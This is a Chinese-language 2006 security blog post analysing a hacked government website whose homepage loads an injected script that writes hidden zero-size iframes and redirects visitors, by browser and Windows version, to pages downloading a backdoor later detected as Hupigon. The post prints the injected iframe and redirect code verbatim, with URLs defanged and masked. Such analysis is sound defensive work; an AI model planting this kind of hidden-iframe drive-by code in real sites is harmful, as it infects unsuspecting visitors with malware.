endurer 原创
2006-02-15 第3版 瑞星将xxxxx.pif 报为:Backdoor.Gpigeon.vhq,卡巴斯基将xxxxx.pif 报为:Backdoor.Win32.Hupigon.lz2006-02-10 第2版 江民KV2006将xxxxx.pif 报为:Backdoor/Huigezi.cbf2006-02-09 第1版
今天又发现一个被被加入自动下载病毒文件的代码的政府网站,其手法与 某政府网站被加入的自动下载病毒文件的代码变了花样 相同,但自动下载的病毒“升级”了。
在该网站首页,仍是使用:
<script src=hxxp://www.****tour5166.com/tour/Check.js></script>
来引入文件Check.js。
而且这个Check.js的内容未变,为:
document.write("<iframe height=0 width=0 src=hxxp://www.***csedu.gov.cn/workOA/good/index.htm></iframe>");document.write("<iframe height=0 width=0 src=hxxp://www.***hjonline.zk.cn/muma/mm.htm></iframe>");document.write("<iframe height=0 width=0 src=hxxp://whc330330.***go.3322.org></iframe>");
其中:
hxxp://whc330330.***go.3322.org被hxxp://www.3322.org的管理员关闭。
而
hxxp://www.***csedu.gov.cn/workOA/good/index.htm
的内容为:
<iframe src="hxxp://www.qq.com/" width="800" height="600"></iframe> <script language=javascript>ie='fucksnow';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='nt';if(!(ver.indexOf('Windows 98')==-1)){ie='98';}location.href=ie '.htm';</script>
该脚本会根据浏览器和Windows版本的不同,自动下载
hxxp://www.***csedu.gov.cn/workOA/good/fucksnow.htm
或
hxxp://www.***csedu.gov.cn/workOA/good/nt.htm
或
hxxp://www.***csedu.gov.cn/workOA/good/98.htm
在打开这三个网页文件时自动下载的文件名未变,仍是:
1. hxxp://www.***csedu.gov.cn/workOA/good/mmmmm.gif
2. hxxp://www.***csedu.gov.cn/workOA/good/xxxxx.pif
3. hxxp://***.****xuemulove.com/a.gif(可能已不存在,未能获取)
其中3.hxxp://***.****xuemulove.com/a.gif,仍然未能获取。
而1.和2.的文件长度变了,瑞星和江民均未报,http://virusscan.jotti.org/上的各扫描引擎也不报,但status为POSSIBLY INFECTED/MALWARE。
*2006-02-11补充:江民KV2006将xxxxx.pif 报为:Backdoor/Huigezi.cbf。
*2006-02-15补充:瑞星将xxxxx.pif 报为:Backdoor.Gpigeon.vhq,卡巴斯基将xxxxx.pif 报为:Backdoor.Win32.Hupigon.lz